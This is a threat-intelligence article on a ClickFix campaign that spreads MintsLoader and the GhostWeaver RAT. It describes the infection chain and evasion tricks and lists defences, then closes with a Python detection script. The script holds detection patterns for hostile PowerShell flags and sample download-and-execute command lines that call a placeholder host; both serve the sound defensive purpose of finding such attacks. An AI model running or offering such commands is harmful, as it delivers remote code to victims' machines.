The Phantom Payload Haunting Windows: MintsLoader and GhostWeaver's Stealth Campaign
- Javier Conejo del Cerro
- May 2

Fake browser update pages are back, but this time, they bring ghosts. A new phishing campaign leveraging a technique known as ClickFix is distributing a stealthy infection chain involving the malware loader MintsLoader and the PowerShell-based remote access trojan (RAT) GhostWeaver. The campaign targets Windows systems and evades detection using a combination of sandbox evasion, domain generation algorithms (DGA), and encrypted command-and-control (C2) traffic secured through self-signed certificates. This kind of campaign reflects the increasing sophistication of social engineering tactics used to lure users into launching malware with just a few clicks.
The Setup: Industrial sectors in the crosshairs
The attackers have set their sights on high-value targets: organizations in the industrial, legal, and energy sectors have been identified as the primary victims. Phishing emails and drive-by links send users to ClickFix pages, malicious sites disguised as legitimate browser update prompts. Unlike a traditional drive-by download, which exploits a browser vulnerability, ClickFix exploits the user: victims are talked into copying and pasting JavaScript or PowerShell code into a terminal or browser console, and in doing so they execute the first stage of the malware chain themselves.
This human-driven infection method adds a layer of complexity for defenders: the user is the one delivering the malware. Once the script is run, it launches MintsLoader—a purpose-built loader with minimal capabilities beyond delivering its payload and evading detection.
Ghost drop through ClickFix
Upon execution, MintsLoader starts a multi-stage infection process. Its obfuscated JavaScript and PowerShell stages are written to frustrate sandboxing and virtual machine analysis. MintsLoader's core job is to download and execute additional payloads. It reaches its command-and-control server through a domain generated daily by a DGA, so a blocklist built from yesterday's observed domain is stale by the time it is deployed, and tracking the infrastructure means reproducing the algorithm rather than collecting individual indicators.
The next stage downloads GhostWeaver, a sophisticated PowerShell-based RAT that talks to its C2 infrastructure over HTTPS. What sets GhostWeaver apart is a self-signed, obfuscated X.509 certificate embedded directly in its script. The certificate itself does not encrypt anything; TLS does that for any HTTPS session. Its value is as a client credential: the implant presents it during the TLS handshake, so the C2 server can tell a real infection apart from a researcher's scanner or a sandbox replaying captured traffic, which makes the C2 channel considerably harder to detect and intercept.
GhostWeaver’s capabilities include:
- Stealing browser credentials, including passwords and session tokens.
- Accessing browsing histories and other user-specific data.
- Injecting malicious HTML into live browser sessions, enabling phishing overlays or fake input forms.
- Delivering and executing additional plugin-based payloads to expand functionality.
This modularity allows GhostWeaver to adapt to different objectives, from credential theft to espionage and beyond. Its stealth-focused design ensures it can linger within systems undetected for extended periods.
Defense measures: Ghostbusting before it's too late
Mitigating a threat like this requires both user awareness and technical controls. Organizations should adopt a multi-layered defense strategy that includes:
- Blocking access to known malicious domains, particularly those associated with fake update sites.
- Filtering incoming scripts for high entropy, obfuscation patterns, and known indicators of compromise.
- Monitoring PowerShell and MSHTA execution, including full command lines and the parent process that launched them; both are routinely abused in malware delivery.
- Inspecting outbound TLS metadata (certificate subject and issuer, validity period, SNI) for self-signed or otherwise unusual certificates, since the content itself is encrypted.
- Detecting domain generation algorithm (DGA) behavior in DNS logs, such as long, high-entropy names and bursts of failed lookups, which indicate malware beaconing to a rotating C2 infrastructure.
- Auditing endpoints for persistence mechanisms, including registry edits, scheduled tasks, and unauthorized browser plugin activity.
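As an added example (not code from the original article or from any vendor tooling), the following Python implements three of the checks above over constructed sample events: flagging PowerShell and MSHTA launches whose command line and parent process match a pasted loader snippet, scoring DNS queries for DGA-like names per source host, and spotting self-signed leaf certificates on outbound TLS. The event field names mimic Sysmon process-creation and Zeek dns/x509 records but are assumptions, as are the regexes, the thresholds and every sample value (hosts under .invalid, RFC 5737 and RFC 1918 addresses).

```python
"""Triage helpers for three telemetry sources: process creation, DNS queries and
outbound TLS certificate metadata.

Every event below is a constructed sample, not data from the campaign. Field
names mimic Sysmon process-creation and Zeek dns/x509 records but are
assumptions, as are the regexes and thresholds."""
import math
import re
from collections import Counter

# --- 1. PowerShell / MSHTA launched the way a pasted ClickFix snippet launches them ---
PS_LOADER_FLAGS = re.compile(
    r"-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|-nop\b|-ep\s+bypass|"
    r"\biex\b|invoke-expression|downloadstring|\birm\b|invoke-restmethod",
    re.I,
)


def basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def flag_process(event):
    """Return the reasons a process-creation event looks like a script loader stage."""
    image, parent = basename(event["image"]), basename(event["parent_image"])
    cmd = event["command_line"]
    reasons = []
    if image in ("powershell.exe", "pwsh.exe") and PS_LOADER_FLAGS.search(cmd):
        reasons.append("powershell with hidden/encoded/download-and-execute flags")
    if image == "mshta.exe" and re.search(r"https?://|javascript:|vbscript:", cmd, re.I):
        reasons.append("mshta running remote or inline script")
    # Code the user pastes into the Run dialog or the desktop shell is launched by
    # explorer.exe; legitimate automation rarely spawns hidden PowerShell from there.
    if reasons and parent == "explorer.exe":
        reasons.append("parent is explorer.exe (interactive paste)")
    return reasons


# --- 2. DGA-style names in DNS logs ---
def shannon_entropy(s):
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def dga_score(fqdn):
    """0-4 heuristic score on the registrable label: long, high-entropy, vowel-poor,
    digit-heavy labels score high. Long real words (e.g. 'microsoftonline') still pass
    the entropy test, so alert only at 3 or more, never on entropy alone."""
    parts = fqdn.rstrip(".").lower().split(".")
    label = parts[-2] if len(parts) > 1 else parts[0]  # crude: ignores 2-part TLDs
    checks = (
        len(label) >= 12,
        shannon_entropy(label) >= 3.5,
        sum(ch in "aeiou" for ch in label) / len(label) < 0.25,
        sum(ch.isdigit() for ch in label) >= 3,
    )
    return sum(checks)


def suspicious_dns_hosts(dns_events, min_score=3):
    """Map each source host to the DGA-like names it resolved, with the response code.
    NXDOMAIN answers for such names are the classic sign of a client walking through
    generated candidates until one resolves to the live C2."""
    hits = {}
    for ev in dns_events:
        if dga_score(ev["query"]) >= min_score:
            hits.setdefault(ev["src"], []).append((ev["query"], ev["rcode"]))
    return hits


# --- 3. Self-signed leaf certificates on outbound TLS ---
def is_self_signed(x509):
    """A self-signed certificate names itself as issuer; one embedded in a script
    will never chain to a public CA, so subject == issuer is the cheap first filter."""
    return x509["subject"] == x509["issuer"]


# Constructed samples (assumed field names, RFC 5737 / RFC 1918 addresses).
PROCESS_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": 'powershell -w hidden -nop -c "iex (irm https://example.invalid/upd)"'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Agent\svc.exe",
     "command_line": r"powershell.exe -File C:\Scripts\inventory.ps1"},
    {"image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "mshta https://example.invalid/run.hta"},
]
DNS_EVENTS = [
    {"src": "10.0.0.12", "query": "xk4q9zt7mwpl.invalid", "rcode": "NXDOMAIN"},
    {"src": "10.0.0.12", "query": "q7vhz2nxr5tc.invalid", "rcode": "NXDOMAIN"},
    {"src": "10.0.0.12", "query": "b3mkz9rtx1wq.invalid", "rcode": "NOERROR"},
    {"src": "10.0.0.12", "query": "login.microsoftonline.com", "rcode": "NOERROR"},
    {"src": "10.0.0.5", "query": "www.wixstatic.com", "rcode": "NOERROR"},
]
TLS_EVENTS = [
    {"src": "10.0.0.12", "dst": "203.0.113.7:443", "subject": "CN=localhost", "issuer": "CN=localhost"},
    {"src": "10.0.0.5", "dst": "203.0.113.20:443", "subject": "CN=*.example.com", "issuer": "CN=Example Public CA"},
]

if __name__ == "__main__":
    for ev in PROCESS_EVENTS:
        print(basename(ev["image"]), "->", flag_process(ev) or "clean")
    print("DGA hosts:", suspicious_dns_hosts(DNS_EVENTS))
    for rec in TLS_EVENTS:
        print(rec["dst"], "self-signed" if is_self_signed(rec) else "CA-issued")
```

Each check is deliberately cheap and noisy on its own; the point of the sample is correlation. A single host that spawns hidden, encoded PowerShell from explorer.exe, then resolves several high-scoring names, then completes a TLS handshake to a self-signed server is worth an analyst's time even when none of the three alerts would be in isolation.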
Training end users to recognize fake update pages and to never paste code from an unverified source into a terminal, console, or Run prompt is just as critical. When the infection depends on the victim's own keystrokes, awareness is the first line of defense.